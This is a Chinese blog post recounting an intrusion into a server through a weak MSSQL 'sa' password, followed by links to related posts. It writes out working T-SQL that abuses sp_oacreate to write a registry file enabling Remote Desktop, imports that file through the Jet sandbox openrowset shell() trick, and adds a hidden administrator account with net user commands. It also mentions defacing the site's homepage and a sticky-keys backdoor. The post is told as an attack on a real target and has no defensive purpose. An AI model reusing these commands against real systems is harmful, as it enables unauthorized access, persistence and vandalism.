2. 程式人生 > >記一次基於mssql的入侵

記一次基於mssql的入侵

阿新 發佈:2019-01-18

通過掃描發現目標機器mssql的sa存在弱口令;

上xp_cmdshell,沒有結果;

上xp_dirtree看目錄結構,定位web目錄,修改主頁;

難道就到此了嗎?不,繼續;

發現3389埠未開,寫登錄檔檔案開通3389

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\mstsc.reg', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Windows Registry Editor Version 5.00'
exec @ret = sp_oamethod @f, 'writeline', NULL,'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]'
exec @ret = sp_oamethod @f, 'writeline', NULL,'"fDenyTSConnections"=dword:00000000'
exec @ret = sp_oamethod @f, 'writeline', NULL,'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]'
exec @ret = sp_oamethod @f, 'writeline', NULL,'"PortNumber"=dword:00000d3d'
exec @ret = sp_oamethod @f, 'writeline', NULL,'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]'
exec @ret = sp_oamethod @f, 'writeline', NULL,'"PortNumber"=dword:00000d3d'

沙盒執行mstsc.reg,匯入登錄檔

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("regedit /s d:\mstsc.reg")')

順便加個使用者net user username userpwd /add, 加入管理員組net localgroup administrators username /add;

啟動mstsc,嘗試登入,看到如下畫面:


算了,不登陸了;

使用5個shift漏洞,shift點5下,開始瀏覽檔案




相關推薦

基於mssql入侵

通過掃描發現目標機器mssql的sa存在弱口令; 上xp_cmdshell,沒有結果; 上xp_dirtree看目錄結構,定位web目錄,修改主頁; 難道就到此了嗎?不,繼續; 發現3389埠未開,寫登錄檔檔案開通3389 declare @o int, @f int,

基於mysql的入侵Simple

一切從MS15-034/CVE-2015-1635漏洞開始 通過nmap掃描發現內網中的一臺機器存在漏洞CVE-2015-1635 於是發起一次BSOD的攻擊 So it’s just BSOD and reboot! 除了這些,還能做些什麼呢?

基於vue的spa多頁簽實踐經驗

ofo ace 加載 名稱 mman date 頁簽 一鍵安裝 route 前言 最近收到一個這樣的需求,要求做一個基於 vue 和 element-ui 的通用後臺框架頁,具體要求如下: 要求通用性高,需要在後期四十多個子項目中使用,所以大部分地方都做成可配置的.

後臺被入侵的事件及反思

前幾天後臺被入侵,造成伺服器癱瘓數個小時,雖然資料都沒有丟失,但是也著實嚇出一身汗,下面還原整個事件 晚上10點左右,有人反應進不去app了,我還以為是玩笑,結果是伺服器檔案被刪除了,趕緊停服務檢視,c

基於react、cra2、typescript的pwa專案由開發到部署(三)

該篇文章為本系列最後一篇文章,因為最近樓主忙於畢設,所以這也是一篇被鴿了很久很久的文章。該文章主要講的是該專案的部署部分,包括: 如何將該專案部署到nginx伺服器上。 為它配置證書,讓它執行在https協議上等。 專案回顧 這是一個基於creat-react-app2的pwa專案。可以新

艱苦的入侵

本文已在黑客防線05年第3期發表04年不平凡的一年,各種漏洞相繼發現,各種入侵技巧也應運而生,原本固若金湯的機器,在新的漏洞面前,也變的弱不禁風。牛人發現並編寫的Serv-u的溢位程式,為提升系統許可權大開方便之門,NBSI把SQL注入發揮的淋漓盡致,PHP注入也日趨成熟,哪位怪才發現的上傳漏洞在很多指令碼中

linux伺服器入侵應急響應

近日接到客戶求助,他們收到託管電信機房的資訊,通知檢測到他們的一臺伺服器有對外發送攻擊流量的行為。希望我們能協助排查問題。   一、確認安全事件 情況緊急,首先要確認安全事件的真實性。經過和伺服器運維人員溝通,瞭解到業務只在內網應用,但伺服器竟然放開到公網了,能在公網直接ping通,且開放了

基於LR的UDP和TCP效能測試

背景   最近專案要做效能測試,要出要一份效能報告,讓我出一個有關Tcp和Udp的功能模組的測試,流程大概是這樣,先走TCP協議協商一下會話,協商成功後走Udp收發資料。      有點簡單啊,自己寫個功能模組測一下,然後把結果展示出來就ok了。   然而想法很美好,現實有點殘酷。idea瞬間被pas

公司mssql server密碼頻繁被改的事件

## 環境描述 近期公司伺服器mssql密碼頻繁被改,導致各種業務系統無法連線,報錯。昨天來公司,發現4臺數據庫3臺密碼都變了。今天嘗試著去查查是否能找到問題根源。 ## 步驟 1. 4臺伺服器3臺連不上,只有64還活著 ![pic](https://images.cnblogs.com/cnb

基於雲服務開發文件線上編輯系統的開發記錄,支援版本記錄、可增加批註。

  從工作實習的時候我就參與了一個專案叫做“雲文件管理系統”,說白了就是檔案的上傳、下載、預覽、分享、回收站等等一些操作。上傳下載以及分享都很Easy,複雜的就在文件預覽上,圖片、視訊、音訊都有現成的外掛可以使用,Office文件的線上預覽相對來說還是比較複雜的,當時也是看好多把Off

MSSQL 刪除數據特別慢

刪除 char pan name sel 刪除數據 pri sta key x ["Table閃亮登場"] 主表:Base(BaseID Int,BaseName Nvarchar(200)) 關系表:BaseForUser(BaseForUserID Int,Base

服務器被入侵的調查取證

TP 應用 html mon down 幾分鐘 log 一個 elf文件 0×1 事件描述 小Z所在公司的信息安全建設還處於初期階段,而且只有小Z新來的一個信息安全工程師,所以常常會碰到一些疑難問題。一天,小Z接到運維同事的反映,一臺tomcat 的web服務器雖然安裝了殺

“噁心”的利潤報表開發(基於阿里雲MaxCompute)

前言 作為一名資料人員,報表開發可能是難以繞過的一項工作。運營、市場、銷售、財務等部門總會有各種各樣的報表需求。我也算是經歷過不少風雨的一號人物了,為財務開發利潤報表仍然讓我頭疼不已。 設計思路 一、靈活的引數 利潤報表中有很多引數並不是固化的,而是在不同的時期會有不同的

mssql手工注入

記一次mssql手工注入 記錄一次mssql注入的過程,很多都是久的知識,大家當溫故而知新吧。 xxxx/xxx?nIDX=122‘ 注入報錯,直接sqlmap跑,但有waf攔截; 只能進行fuzz了,發現select 和 from之間用/**/就可以繞過。 (1)首先檢視

websocket基於php 結合PHP多程序和socket.io解決問題的經歷

記一次結合PHP多程序和socket.io解決問題的經歷     公司是做棋牌遊戲的。前段時間接到一個後臺人工鑑定並處理通牌作弊玩家的需求,其中需要根據幾個玩家的遊戲ID查詢並計算他們在某段時間內彼此之間玩牌輸贏次數和輸贏總額。   牌局資料是儲存在日誌中心的,他們把牌

主機入侵攻防大戰:firewalld防火牆指定的IP段的埠訪問控制

一、背景 一大早來公司,登入那臺暴露在外網的伺服器,登入成功的時候,看到160000+次登入失敗的記錄,看到這個我和我的小夥伴們都驚呆了,是誰那麼執著?小夥伴還開玩笑說是不是誰跟你有世仇啊,這麼搞你!來活了,我的伺服器我做主,搞起,who怕who? 二、

MSSQL到MySQL大資料遷移過程

工作中遇到一個需求 要將MSSQL資料庫中共計12張表的資料大概1000W行資料遷移到MySQL資料庫中,去年另一個同事負責這件事情,他採用的方法是先將MSSQL資料庫裡的資料生成同MySQL資料庫表結構一致的12張表,然後用我提供的一個delphi寫的一個工具來進行遷移。工具用的UniDAC的TCRBa

入侵XP系統的經歷

 這是一次真實的入侵例項, 事情發生在2005年的九月的一天,我們單位被集團公司的另一個大單位兼併。被兼併的第二天,大單位的財務人員到了我們廠,對我們廠進行了全面的財務審查。雖然沒查出什麼問題,顯然這幫人是對我們不放心的,下午他們又開始拉區域網線到我們的辦公室,要和我們聯網,

mapreduce讀取不到輸入文件的問題

mapreduce 過濾器hdfs上輸入文件所在包含兩個目錄,分別是: /20170503/shoplast/ /20170503/shop/但是我想過濾掉shop,只把shoplast作為輸入故我實現了過濾器如下: public static class Fi

阿裏電面經歷

art 存儲空間 自由 結束 eas 大型 特定 easy col 昨天下午(3/19)三點多鐘,接到了一個杭州的電話,是阿裏的。問我是否方便聊聊。我說我在上課,四點下課。然後他就四點多鐘的時候又打了一次過來。項目經歷上來就問我有無大型項目的經歷。不好意思,我說無。。。又